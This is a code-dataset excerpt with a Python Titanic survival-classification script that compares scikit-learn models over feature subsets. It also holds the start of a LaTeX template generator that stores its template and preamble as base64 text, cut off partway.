"alpha_fraction": 0.6072536706924438,
"alphanum_fraction": 0.6136728525161743,
"avg_line_length": 35.51171875,
"blob_id": "b33541e0ef8a60bdc05fb8d7d0f52cc34706093e",
"content_id": "edc5282f6c47f9c9b034b06f8686f9f76b4ee075",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 9347,
"license_type": "no_license",
"max_line_length": 79,
"num_lines": 256,
"path": "/classification.py",
"repo_name": "suno09/Titanic",
"src_encoding": "UTF-8",
"text": "import itertools\nimport re\nimport sys\nimport pickle\nfrom time import time, strftime, gmtime\nfrom copy import deepcopy\n\nimport numpy as np\nimport pandas as pd\n# from sklearn.cross_validation import train_test_split\nfrom sklearn.neural_network import MLPClassifier\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.naive_bayes import GaussianNB\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.preprocessing import LabelEncoder, OneHotEncoder\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.svm import SVC\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.model_selection import KFold, cross_val_score\n\nstart_time = time()\n\n# * Data preprocessing\n# read csv file train and test\ndataframe = pd.read_csv('data/train.csv')\n\n# Create column NameType(Mr, Mrs, ...) from Name\ndataframe['NameType'] = [\n re.sub(r'.+?, (.+?)\\..*', r'\\1', name) for name in dataframe.Name\n]\ndataframe.NameType = dataframe.NameType.replace(\n ['Sir', 'Capt', 'Major', 'Don', 'Rev', 'Jonkheer', 'Col'],\n \"Mr\"\n)\ndataframe.NameType = dataframe.NameType.replace(\n ['Mlle', 'Lady', 'Mme', 'Miss', 'Mrs', 'the Countess', 'Dona'],\n \"Ms\"\n)\n\n# replace row contains sex = female and nameType = Dr by Ms\ndataframe.loc[\n (dataframe.Sex == \"female\") & (dataframe.NameType == \"Dr\"), 'NameType'\n] = \"Ms\"\n# replace row contains sex = male and nameType = Dr by Mr\ndataframe.loc[\n (dataframe.Sex == \"male\") & (dataframe.NameType == \"Dr\"), 'NameType'\n] = \"Mr\"\n\n# create family size\ndataframe['FamilySize'] = dataframe.SibSp + dataframe.Parch\n# Fare per passenger (fare per ticket)\ndataframe['FarePerPerson'] = dataframe.Fare / (dataframe.FamilySize + 1)\n\n# replace the NaN with \"Unknown\"\ndataframe.Cabin.fillna('', inplace=True)\n# create the count of Cabin\ndataframe['CabinCount'] = dataframe.Cabin.apply(\n lambda c: len(str(c).strip().split())\n)\n# create the number of Cabin (nbr after the letter)\n# (if exist one or more of cabins so get the first else 0)\ndataframe['NbrOfCabin'] = dataframe.Cabin.apply(\n lambda cs: list(filter(\n lambda c: len(c) > 1, str(cs).strip().split()\n ))\n)\ndataframe.NbrOfCabin = [\n int(c[0][1:]) if c != [] else 0 for c in dataframe.NbrOfCabin\n]\n# Create Column and take the first letter of the cabin and\ndataframe['CabinType'] = dataframe.Cabin\ndataframe.CabinType = [c[0] if c else 'U' for c in dataframe.CabinType]\n# person per Cabin\ndataframe['PersonPerCabin'] = (dataframe.FamilySize + 1) / dataframe.CabinCount\ndataframe.loc[\n dataframe.PersonPerCabin == np.inf, 'PersonPerCabin'\n] = dataframe.loc[dataframe.PersonPerCabin == np.inf, 'FamilySize']\n# Fare of cabin\ndataframe['FareOfCabin'] = dataframe.Fare / dataframe.CabinCount\ndataframe.loc[\n (dataframe.FareOfCabin == np.inf) | dataframe.FareOfCabin.isnull(),\n 'FareOfCabin'\n] = 0\n# # Create column and set the cabin by position\n# A = best pos, ..., G = worst pos, U = worst pos\n# cabin_pos = {v: 1./k for k, v in enumerate(\n# ['T', 'A', 'B', 'C', 'D', 'E', 'F', 'G', 'U'], 1)}\n# dataframe['CabinPos'] = [cabin_pos[c] for c in dataframe.CabinType]\n\n#\ndataframe.Age = dataframe.groupby([\"NameType\"]).transform(\n lambda a: a.fillna(a.mean())\n).Age\n#\ndataframe.Embarked.fillna('U', inplace=True)\n\n# the new dataframe with deleting some columns\ndf_prep = dataframe.drop(\n ['PassengerId', 'Name', 'Ticket', 'Cabin'],\n axis=1\n)\n\n# get 
the list of target Survived\ny = df_prep.Survived.values\ndf_prep = df_prep.drop(['Survived'], axis=1)\n\n# get the cols of type \"object\"\n# object_cols = ['Sex', 'Embarked', 'NameType', 'CabinType']\nobject_cols = df_prep.select_dtypes(\"object\").columns\n# Convert the categorical data to numbers\nlabel_encoders = {}\nfor obj_col in object_cols:\n label_encoder = LabelEncoder()\n label_encoder.fit(df_prep[obj_col])\n df_prep[[obj_col]] = df_prep[[obj_col]].apply(label_encoder.transform)\n label_encoders[obj_col] = label_encoder\n\n# generate the classifiers\n# key : name of algorithm\n# value : list of size 2 which contains algorithm and params of algo\nclassifiers = {\n \"Logistic Regression\": [LogisticRegression, {'random_state': 0}],\n \"KNN\": [KNeighborsClassifier,\n {'n_neighbors': 1, 'metric': 'minkowski', 'p': 2}],\n \"SVM rbf\": [SVC, {'kernel': 'rbf', 'random_state': 0}],\n \"SVM poly\": [SVC, {'kernel': 'poly', 'random_state': 0}],\n \"SVM sigmoid\": [SVC, {'kernel': 'sigmoid', 'random_state': 0}],\n \"SVM precomputed\": [SVC, {'kernel': 'precomputed', 'random_state': 0}],\n \"SVM linear\": [SVC, {'kernel': 'linear', 'random_state': 0}],\n \"Naive Bayes\": [GaussianNB, {}],\n \"Decision Tree\": [DecisionTreeClassifier, {'criterion': \"entropy\",\n 'random_state': 0}],\n \"Random Forest\": [RandomForestClassifier,\n {'n_estimators': 10,\n 'criterion': 'entropy',\n 'random_state': 0}]\n}\nlen_algorithms = classifiers.__len__()\n# count of all columns in data\nlen_cols = len(df_prep.columns)\nend_nbr_f = df_prep.columns.__len__()\n# end_nbr_f = 3\nstart_nbr_f = end_nbr_f // 5 + 1\n# start_nbr_f = start_nbr_f if start_nbr_f != 0 else 1\nnbr_tests = sum(\n len(list(itertools.combinations(range(len_cols), nbr_features))) for\n nbr_features in range(start_nbr_f, end_nbr_f + 1)\n) * len_algorithms\n\n# use K fold\nkf = KFold(n_splits=9)\n\n# classifiers = {\n# \"Logistic Regression\": LogisticRegression(**{'random_state': 0}),\n# \"KNN\": KNeighborsClassifier(\n# **{'n_neighbors': 5, 'metric': 'minkowski', 'p': 2}),\n# \"SVM\": SVC(**{'kernel': 'rbf', 'random_state': 0}),\n# \"Naive Bayes\": GaussianNB(),\n# \"Decision Tree\": DecisionTreeClassifier(**{'criterion': \"entropy\",\n# 'random_state': 0})\n# ,\n# \"Random Forest\": RandomForestClassifier(**\n# {'n_estimators': 10,\n# 'criterion': 'entropy',\n# 'random_state': 0})\n# }\n\nresults = []\n\n# generate classifiers\nfor nbr_features in range(start_nbr_f, end_nbr_f + 1):\n for indexes_cols in itertools.combinations(range(len_cols), nbr_features):\n columns = [col for index, col in enumerate(df_prep.columns)\n if index in indexes_cols]\n x = df_prep[columns].values.astype(np.float64)\n\n # get indexes of type objects\n indexes_object_cols = [index for index, col in enumerate(columns)\n if col in object_cols]\n\n # use dummy variables for columns of types object\n if indexes_object_cols:\n onehotencoder = OneHotEncoder(\n categorical_features=indexes_object_cols\n )\n x = onehotencoder.fit_transform(x).toarray()\n # x_test = onehotencoder.transform(x_test).toarray()\n else:\n onehotencoder = None\n\n # Feature Scaling\n sc = StandardScaler()\n x = sc.fit_transform(x)\n # x_test = sc.transform(x_test)\n\n for name_classifier, [classifier, params] in classifiers.items():\n # extract columns\n # Start generate model\n # print(name_classifier, columns)\n ml_classifier = classifier(**params)\n scores = cross_val_score(ml_classifier, x, y, cv=kf)\n # print(name_classifier, \" => \", scores)\n # ml_classifier.fit(x_train, y_train)\n\n 
# save the result\n # print(name_classifier)\n results.append({\n \"x_y\": [x, y],\n \"dummy_var\": onehotencoder,\n \"feature_scaling\": sc,\n \"classifier\": ml_classifier,\n \"features\": list(columns),\n \"algorithm\": name_classifier,\n \"accuracy\": max(scores)\n })\n\n # print the progression\n progress_value = results.__len__() * 100. / nbr_tests\n sys.stdout.write(\"\\r\")\n sys.stdout.write(\"Progression |%-50s| %.2f %% (%s)\" %\n (\"\\u2588\" * int(progress_value / 2.),\n progress_value,\n strftime(\"%H:%M:%S\", gmtime(time() - start_time))\n )\n )\n sys.stdout.flush()\n\n# sort and view results\nmax_accuracy = max([d['accuracy'] for d in results])\nbest_classifier = min(\n filter(lambda d: d['accuracy'] == max_accuracy, results),\n key=lambda d: len(d['features'])\n)\n\nend_time = time()\n\nprint(\"\\nThe best classifier is %s\" % best_classifier['algorithm'])\nprint(\"The accuracy : %.2f %%\" % (max_accuracy * 100.))\nprint(\"The columns : %s\" % best_classifier['features'])\nprint(\"The duration of execution : %s\" %\n strftime(\"%H hours %M minutes %S seconds\", gmtime(end_time - start_time))\n )\nprint(\"Number of tests = %d tests\" % results.__len__())\n\n# add the test data to best classifier\nx, y = best_classifier['x_y']\nbest_classifier['classifier'].fit(x, y)\n\n# save label encoders\nbest_classifier['label_encoders'] = label_encoders\n\n# Save best classifier to pickle as dictionary\nwith open('best_classifier.pik', 'wb') as wp:\n pickle.dump(best_classifier, wp)\n"
}
] | 4 |
CarlsenSmart/LaTeX-Preamble_and_Examples
|
https://github.com/CarlsenSmart/LaTeX-Preamble_and_Examples
|
8631476098365d516cfff01ec45998f366fc8e79
|
cafd2cdae856b1aff35f014e97cf3a90c97d2fdc
|
83444d6bdaa6dd5a860afc7462142d03ec53cd65
|
refs/heads/master
| 2021-01-21T06:24:43.098318 | 2017-02-25T12:25:45 | 2017-02-25T12:25:45 | null | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6765249371528625,
"alphanum_fraction": 0.6816081404685974,
"avg_line_length": 35.06666564941406,
"blob_id": "a98d5100b04103e9335b768afafe955a519d7f9d",
"content_id": "0bccfa983605939b7359deb811641ee939d1ac04",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2164,
"license_type": "permissive",
"max_line_length": 123,
"num_lines": 60,
"path": "/python/latexgen.py",
"repo_name": "CarlsenSmart/LaTeX-Preamble_and_Examples",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n\nimport os\nimport base64\nimport argparse\ntemplate = \"\"\"JSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJQolIExvYWQgUHJlYW1wbGUgICAgICAgICAlCiUlJSUl\nJSUlJSUlJSUlJSUlJSUlJSUlJSUKClxkb2N1bWVudGNsYXNzW2E0LCBlbmdsaXNoXXthcnRpY2xl\nfQoKJUltcG9ydCBmcm9tIHRoZSBzYW1lIGZvbGRlcgolXGlucHV0e3ByZWFtYmxlX2VuLnRleH0K\nCiVJbXBvcnQgZnJvbSBhYnNvbHV0ZSBwYXRoCiVcdXNlcGFja2FnZXtpbXBvcnR9CiVcaW1wb3J0\ne0M6L0dpdEh1Yi9MYVRlWF9QcmVhbWJsZV9hbmRfRXhhbXBsZXMvcHJlYW1ibGUvfXtwcmVhbWJs\nZV9kay50ZXh9CgolSW1wb3J0IGZyb20gYSByZWxhdGl2ZSBwYXRoClx1c2VwYWNrYWdle2ltcG9y\ndH0KXHN1YmltcG9ydHsuLi9wcmVhbWJsZS99e3ByZWFtYmxlX2VuLnRleH0KCiUlJSUlJSUlJSUl\nJSUlJSUlJSUlJSUlJSUKJSBEb2N1bWVudCBzdGFydHMgaGVyZSEgJQolJSUlJSUlJSUlJSUlJSUl\nJSUlJSUlJSUlCgpcYmVnaW57ZG9jdW1lbnR9CgolIERlZmluZSB0aXRsZSBhbmQgbW9yZSBvbiBm\ncm9udHBhZ2UKCVxzZXR0aXRsZXtUaXRsZX17U3VidGl0bGV9CiAgICBcYWRkYXV0aHtTdGVmZmFu\nIFPDuGx2c3Rlbn17MjAxNTA1ODMyQHBvc3QuYXUuZGt9e1wsIGF1NTM0MDY4fQpcbWFrZXRpdGxl\nCgpcYmVnaW57YWJzdHJhY3R9Clxub2luZGVudApMb3JlbSBpcHN1bSBkb2xvciBzaXQgYW1ldCwg\nY29uc2VjdGV0dXIgYWRpcGlzY2luZyBlbGl0LCBzZWQgZG8gZWl1c21vZCB0ZW1wb3IgaW5jaWRp\nZHVudCB1dCBsYWJvcmUgZXQgZG9sb3JlIG1hZ25hIGFsaXF1YS4gVXQgZW5pbSBhZCBtaW5pbSB2\nZW5pYW0sIHF1aXMgbm9zdHJ1ZCBleGVyY2l0YXRpb24gdWxsYW1jbyBsYWJvcmlzIG5pc2kgdXQg\nYWxpcXVpcCBleCBlYSBjb21tb2RvIGNvbnNlcXVhdC4KXGVuZHthYnN0cmFjdH0KClx0YWJsZW9m\nY29udGVudHMKClxuZXdwYWdlClxzZWN0aW9ue0ludHJvZHVjdGlvbn0gXGxhYmVse3NlYzppbnRy\nb30KTG9yZW0gaXBzdW0gZG9sb3Igc2l0IGFtZXQsIGNvbnNlY3RldHVyIGFkaXBpc2NpbmcgZWxp\ndCwgc2VkIGRvIGVpdXNtb2QgdGVtcG9yIGluY2lkaWR1bnQgdXQgbGFib3JlIGV0IGRvbG9yZSBt\nYWduYSBhbGlxdWEuIFV0IGVuaW0gYWQgbWluaW0gdmVuaWFtLCBxdWlzIG5vc3RydWQgZXhlcmNp\ndGF0aW9uIHVsbGFtY28gbGFib3JpcyBuaXNpIHV0IGFsaXF1aXAgZXggZWEgY29tbW9kbyBjb25z\nZXF1YXQuCgoKClxiZWdpbnt0aGViaWJsaW9ncmFwaHl9ezl9ClxiaWJpdGVte2JpYml0ZW19CglM\nYXN0LCBGaXJzdDogXGVtcGh7VGl0bGV9LCBwdWJsaWNhdGlvbiwgZWRpdGlvbiwgeWVhcgpcZW5k\ne3RoZWJpYmxpb2dyYXBoeX0KXGJpYmxpb2dyYXBoeXN0eWxle2FiYnJ2fQpcYmlibGlvZ3JhcGh5\ne3JlZmVyZW5jZXJ9CgpcbmV3cGFnZQpcYXBwZW5kaXgKXHNlY3Rpb257QXBwZW5kaXh9CkxvcmVt\nIGlwc3VtIGRvbG9yIHNpdCBhbWV0LCBjb25zZWN0ZXR1ciBhZGlwaXNjaW5nIGVsaXQsIHNlZCBk\nbyBlaXVzbW9kIHRlbXBvciBpbmNpZGlkdW50IHV0IGxhYm9yZSBldCBkb2xvcmUgbWFnbmEgYWxp\ncXVhLiBVdCBlbmltIGFkIG1pbmltIHZlbmlhbSwgcXVpcyBub3N0cnVkIGV4ZXJjaXRhdGlvbiB1\nbGxhbWNvIGxhYm9yaXMgbmlzaSB1dCBhbGlxdWlwIGV4IGVhIGNvbW1vZG8gY29uc2VxdWF0LgoK\nXGVuZHtkb2N1bWVudH0=\n\"\"\"\npreamble_base = 
\"\"\"JSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUKJSAgICBQYXBlcnNpemUgYW5kIGVuY29k\naW5nICAgICUKJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUKCiUgU2l6ZSBvZiBtYXJn\naW5zIGNhbiBiZSBjaGFuZ2VkIGhlcmUgaW4gdGhlIG91dGNvbW1lbnRlZCB2ZXJzaW9uIQolXHVz\nZXBhY2thZ2VbYTRwYXBlciwgdG90YWw9ezZpbiwgOGlufV17Z2VvbWV0cnl9CSV0b3RhbD17d2lk\ndGgsIGhlaWdodH0KXHVzZXBhY2thZ2VbYTRwYXBlcl17Z2VvbWV0cnl9CgolIEJhc2ljczogZm9u\ndCwgY29kZWMgZXRjLgpcdXNlcGFja2FnZVt1dGY4XXtpbnB1dGVuY30JCQkJCQklIGVuY29kaW5n\nOiB1dGYtOCAobm9yZGljIGxldHRlcnMpClx1c2VwYWNrYWdlW1QxXXtmb250ZW5jfQkJCQkJCSUg\ndXNlIDgtYml0IGVuY29kZWQgZm9udHMKXHJlbmV3Y29tbWFuZHtcc2ZkZWZhdWx0fXtwaHZ9CQkJ\nCQklIGNoYW5nZXMgdGhlIGRlZmF1bHQgZm9udAoKJVx1c2VwYWNrYWdlW3BhcmZpbGxde3BhcnNr\naXB9ICAgICAgJUluc3RlYWQgb2YgaW5kZW50aW5nIG9uIGEgbmV3bGluZSBhZGRzIHdoaXRlc3Bh\nY2UKCgoKJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUKJSAgICAgIFRhYmxlcyBhbmQg\nZmlndXJlcyAgICAgICUKJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUKClx1c2VwYWNr\nYWdle3RhYnVsYXJ4LGJvb2t0YWJzLGF1dGhibGt9CQkgICAgJSB2YXJpb3VzIGJhc2ljIHN0dWZm\nIGZvciB0YWJsZXMgYW5kIG1vcmUKCiUgRmlndXJlcyBhbmQgY2FwdGlvbnMKXHVzZXBhY2thZ2V7\nY2FwdGlvbn0JCQkJCQkJJSBjcmVhdGUgY2FwdGlvbnMgZm9yIGZpZ3VyZXMKXHVzZXBhY2thZ2V7\nc3ViZmlnfQkJCQkJCQkJJSBjcmVhdGUgc3ViZmlndXJlcyBvZiBhIGZpZ3VyZQolXHVzZXBhY2th\nZ2V7c3ViY2FwdGlvbn0JCQkJCSUgY3JlYXRlIGNhcHRpb25zIGZvciBzdWJmaWd1cmVzCiAgICAg\nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAlICAgICBjdXJyZW50bHkgb2ZmLCBkdWUgdG8g\nY29uZmxpY3RzCgpcdXNlcGFja2FnZXt3cmFwZmlnfQkJCQkJCQklIGxldHRpbmcgZmlndXJlcyBi\nZSBpbiB0ZXh0CgpcdXNlcGFja2FnZXtyb3RhdGluZ30gICAgICAgICAgICAgJSBsZXQgYW55IGVu\ndmlyb25tZW50IGJlIHJvdGF0ZWQgKGZpZ3VyZXMgc2lkZXdheXMpCiAgICAgICAgICAgICAgICAg\nICAgICAgICAgICAgICAgICAlICAgICBcYmVnaW57c2lkZXdheXN9IG9yIFxiZWdpbnt0dXJufXsz\nMH0KCgoKJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlCiUgICAgICAgICAgIFZh\ncmlhYmxlcyAgICAgICAgICAgICAgJQolJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUl\nJSUKXHVzZXBhY2thZ2V7cGdma2V5c30JCQklSW5pdGlhbGl6ZSB0aGUgdmFyaWFibGUga2V5LXZh\nbHVlIHBhcmlycwoKXG5ld2NvbW1hbmR7XHNldHZhbHVlfVsxXXtccGdma2V5c3svdmFyaWFibGVz\nLyMxfX0KXG5ld2NvbW1hbmR7XGdldHZhbHVlfVsxXXtccGdma2V5c3ZhbHVlb2Z7L3ZhcmlhYmxl\ncy8jMX19ClxuZXdjb21tYW5ke1xkZWNsYXJlfVsxXXslCiBccGdma2V5c3sKICAvdmFyaWFibGVz\nLyMxLmlzIGZhbWlseSwKICAvdmFyaWFibGVzLyMxLnVua25vd24vLnN0eWxlID0ge1xwZ2ZrZXlz\nY3VycmVudHBhdGgvXHBnZmtleXNjdXJyZW50bmFtZS8uaW5pdGlhbCA9ICMjMX0KIH0lCn0KClxk\nZWNsYXJle30KCgoKJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUKJSAgICAgIExhVGVY\nIFByb2dyYW1taW5nICAgICAgICUKJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUKClx1\nc2VwYWNrYWdle3hwYXJzZX0JCQkJCQkJCSUgU2Nhbm5pbmcgYXJndW1lbnRzClx1c2VwYWNrYWdl\ne2lmdGhlbn0JCQkJCQkJCSUgQ29uZGl0aW9uYWxzClx1c2VwYWNrYWdle2NhbGN9CQkJCQkJCQkl\nIENhbGN1bGF0aW9ucwoKCgolJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJQolICAgICAg\nICAgIEh5cGVybWVkaWEgICAgICAgICAgJQolJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUl\nJQoKXHVzZXBhY2thZ2V7dXJsLCBoeXBlcnJlZn0JCQkJCQklIFx1cmx7bGlua30gLyBcaHJlZnts\naW5rfXtyZXBsYWNpbmcgdGV4dH0KCgoKJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUK\nJSAgICAgICAgIFN0eWxpemF0aW9uICAgICAgICAgICUKJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUl\nJSUlJSUlJSUKCiUgSGVhZGVycyBvZyBmb290ZXJzClx1c2VwYWNrYWdle2xhc3RwYWdlfSAgICAg\nICAgICAgICAgICAgICAgICAgICAgICUgXGxhc3RwYWdlIGNvbW1hbmQgZm9yIG51bWJlcnMgb2Yg\ncGFnZXMKXHVzZXBhY2thZ2V7ZmFuY3loZHJ9ICAgICAgICAgICAgICAgICAgICAgICAgICAgJSBj\ncmVhdGUgY29vbCBoZWFkZXJzIGFuZCBmb290ZXJzClxwYWdlc3R5bGV7ZmFuY3l9ICAgICAgICAg\nICAgICAgICAgICAgICAgICAgICAgICUgd2hvIGRvZXNuJ3Qgd2FudCB0aGVpciBwYWdlIHRvIGJl\nIGZhbmN5PwoKJSBVc2Ugb2YgY29sdW1ucwpcdXNlcGFja2FnZXttdWx0aWNvbH0KCiUgUXVvdGF0\naW9ucwolICJkYW5pc2giIG9yICJicml0aXNoIgp
cdXNlcGFja2FnZVtkYW5pc2g9Z3VpbGxlbWV0\nc117Y3NxdW90ZXN9ICAgIAklIHR3byBzdHlsZXM6ICJxdW90ZXMiIG9yID4+Z3VpbGxlbWV0czw8\nCiVcTWFrZUF1dG9RdW90ZXvCu317wqt9ICAgICAgICAgICAgICAgICAgICAgICAJJSBkZWNvbW1l\nbnQgZm9yIGVhc3kgbWFjcm8KJVxNYWtlQXV0b1F1b3RlKnvigLp9e+KAuX0gICAgICAgICAgICAg\nICAgICAgICAgCSUgZGVjb21tZW50IGZvciBldmVuIGVhc2llciBtYWNyb3MKCgoKJSUlJSUlJSUl\nJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUKJSAgICAgICAgICAgICBNYXRoICAgICAgICAgICAgICUK\nJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUKCiUgdmFyaW91cyBiYXNpYyBzdHVmZgpc\ndXNlcGFja2FnZXtibSwgbWF0aHRvb2xzLCBhbXNtYXRofQoKJSBWYXJpb3VzIHN5bWJvbCBwYWNr\nYWdlcwolXHVzZXBhY2thZ2V7YW1zc3ltYn0KXHVzZXBhY2thZ2VbdXRvcGlhXXttYXRoZGVzaWdu\nfQkJCQkJCSUgZnVsbCBvdmVyd3JpdGUgb2YgdGhlIGZvbnQgc3lzdGVtClx1c2VwYWNrYWdle3N0\nbWFyeXJkfQkJCQkJCQkJJSBldmVuIG1vcmUgc3ltYm9scwoKXGxldFxtYXRoY2FsXHVuZGVmaW5l\nZAkJCQkJCQkJJSBMZXQncyByZWRlZmluZSB0aGUgbWF0aGNhbCBhbHBoYWJldApcRGVjbGFyZU1h\ndGhBbHBoYWJldHtcbWF0aGNhbH17T01TfXtjbXN5fXttfXtufQoKJSBNYXRoIHNob3J0Y3V0cwpc\ncmVuZXdjb21tYW5ke1xkfXtcLCBcbWF0aHJte2R9fSAgICAgICAgICAgICAgICAgICAgJSBcZCA9\nIGRpZmZlcmVudGlhbCBkIHdpdGggYSBiaXQgb2Ygc3BhY2luZwpcbmV3Y29tbWFuZHtcZX17XG1h\ndGhybXtlfX0gICAgICAgICAgICAgICAgICAgICAgICAgJSBcZSA9IGV1bGVycyBudW1iZXIKXG5l\nd2NvbW1hbmR7XFJ9e1xtYXRoYmJ7Un19ICAgICAgICAgICAgICAgICAgICAgICAgICUgXFIgPSBS\nZWFsIG51bWJlcnMKXG5ld2NvbW1hbmR7XE59e1xtYXRoYmJ7Tn19ICAgICAgICAgICAgICAgICAg\nICAgICAgICUgXE4gPSBOYXR1cmFsIG51bWJlcnMKXG5ld2NvbW1hbmR7XEN9e1xtYXRoYmJ7Q319\nICAgICAgICAgICAgICAgICAgICAgICAgICUgXEMgPSBDb21wbGV4IG51bWJlcnMKXG5ld2NvbW1h\nbmR7XFF9e1xtYXRoYmJ7UX19ICAgICAgICAgICAgICAgICAgICAgICAgICUgXFEgPSBSYXRpb25h\nbCBudW1iZXJzClxuZXdjb21tYW5ke1xGfXtcbWF0aGJie0Z9fQkJCQkJCQklIFxGCgpcRGVjbGFy\nZVBhaXJlZERlbGltaXRlclxjZWlse1xsY2VpbH17XHJjZWlsfSAgICAgICAgJSBcY2VpbHthcmd9\nCVxjZWlsKnthcmd9IGZvciBhdXRvbWF0aWMgc2NhbGluZwpcRGVjbGFyZVBhaXJlZERlbGltaXRl\nclxmbG9vcntcbGZsb29yfXtccmZsb29yfSAgICAgJSBcZmxvb3J7YXJnfQlcZmxvb3Iqe2FyZ30g\nZm9yIGF1dG9tYXRpYyBzY2FsaW5nClxEZWNsYXJlUGFpcmVkRGVsaW1pdGVyXGFic3tcbHZlcnR9\ne1xydmVydH0gICAgICAgICAlIFxhYnN7YXJnfQkJXGFicyp7YXJnfSBmb3IgYXV0b21hdGljIHNj\nYWxpbmcKClxuZXdjb3VudGVye2l9CgpcRGVjbGFyZURvY3VtZW50Q29tbWFuZCBcc2VxIHsgZyBn\nIGcgZyB9IHsJCQklIFxzZXF7eH17aX17an17c30KCVxzZXRjb3VudGVye2l9ezB9CQkJCQkJCQkl\nIHhfaSwgeF9pK3MsIC4uLiB4X2oKCVxJZlZhbHVlVCB7IzJ9IHsgXGFkZHRvY291bnRlcntpfXsj\nMn0gfQoJXElmVmFsdWVURiB7IzF9CgkJeyMxfQoJCXt4fQoJX3sgXGFyYWJpY3tpfSB9LAoJXElm\nVmFsdWVURiB7IzR9IAoJCXtcYWRkdG9jb3VudGVye2l9eyM0fX0KCQl7XGFkZHRvY291bnRlcntp\nfXsxfX0KCVxJZlZhbHVlVEYgeyMxfSAKCQl7IzF9CgkJe3h9IAoJX3sgXGFyYWJpY3tpfSB9LAoJ\nXGRvdHMKCVxJZlZhbHVlVEYgeyMzfQoJCXsgLCAjMV97IzN9IH0KCQl7fQp9CgpcRGVjbGFyZURv\nY3VtZW50Q29tbWFuZCBcZXJvIHsgZyBnIH0gewkKCVxiZWdpbnthcnJheX17Y30KCQlcSWZWYWx1\nZVRGeyMxfQoJCQl7X3sjMX19CgkJCXtccGhhbnRvbXtcc2ltfX0KCVxcCgkJXHNpbQoJXFwKCQlc\nSWZWYWx1ZVRGeyMyfQoJCQl7XnsjMn19CgkJCXtccGhhbnRvbXtcc2ltfX0KCVxlbmR7YXJyYXl9\nCn0KClxEZWNsYXJlRG9jdW1lbnRDb21tYW5kIFxzZXQgeyBtIGcgfXsgCQkJCSUgXHNldHN7WH17\nQ30gPSB7IFggfCBDIH0KCSBcbGVmdFxsYnJhY2UKCSAJIzEgXElmVmFsdWVUIHsjMn0geyBcIHwg\nXCAgIzIgfQoJIFxyaWdodFxyYnJhY2UKfQoKXG1ha2VhdGxldHRlcgkJCQkJCQkJCQklIGFkZHMg\ndmVydGljYWwgbGluZXMgdG8gbWF0cmljZXMKXHJlbmV3Y29tbWFuZCpcZW52QG1hdHJpeFsxXVsq\nXGNATWF4TWF0cml4Q29scyBjXXsKICBcaHNraXAgLVxhcnJheWNvbHNlcAogIFxsZXRcQGlmbmV4\ndGNoYXJcbmV3QGlmbmV4dGNoYXIKICBcYXJyYXl7IzF9fQpcbWFrZWF0b3RoZXIKCiUlJSUlJSUl\nJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlCiUgICAgICBMb2dpYyBhbmQgcHJvb2ZzICAgICAgICAl\nCiUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlCgolIFByb29mcwpcdXNlcGFja2FnZXth\nbXN0aG19CQkJCQkJCQklIFRoZW9yZW0gcGFja2FnZQpcdGhlb3JlbXN0eWxle2RlZmluaXRpb259\nCQkJCQ
kJJSBwbGFpbiwgZGVmaW5pdGlvbiwgcmVtYXJrCiVcc3dhcG51bWJlcnMJCQkJCQkJCQkl\nIElmIHlvdSB3YW50IHRvIGhhdmUgdGhlIG51bWJlciBmaXJzdAoKJSBMb2dpYyBwYWNrYWdlcwpc\ndXNlcGFja2FnZXtscGxmaXRjaH0JCQkJCQklIGZpdGNoIHN0eWxlIHByb29mcwoKJVx1c2VwYWNr\nYWdle2xvZ2ljcHJvb2Z9CQkJCQklIGFsdGVybmF0aXZlIHBhY2thZ2UsIHJlc2VtYmxpbmcgdGhl\nIGRCZXJMb2cgYm9vawolXHNldGxlbmd0aFxzdWJwcm9vZmhvcml6c3BhY2V7MmVtfQkJCSUgSW5k\nZW50IGZvciBzdWJwcm9vZnMuIENoYW5nZWQgZm9yIGZyZXNoIHZhcmlhYmxlcwoKCgolJSUlJSUl\nJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJQolICAgICAgQ29sb3IgYW5kIHByZXNldHMgICAgICAg\nJQolJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJQoKJVx1c2VwYWNrYWdle3hjb2xvcn0J\nCQkJCQkJJSBiYXNpYyB4Y29sb3IgcGFja2FnZQpcdXNlcGFja2FnZVt0YWJsZSx4Y2RyYXdde3hj\nb2xvcn0JCQkJJSB4Y29sb3IgcGFja2FnZSB3aXRoIHN1cHBvcnQgZm9yIHRhYmxlcwpcZGVmaW5l\nY29sb3J7bHN0Q29tbWVudH17cmdifXswLjQ1LDAuNDUsMC40NX0JJSBjb2RlOiBjb21tZW50cyAo\nR3JleSkKXGRlZmluZWNvbG9ye2xzdEtleX17cmdifXswLjEzLDAuMjEsMX0JCQklIGNvZGU6IHBy\naW1hcn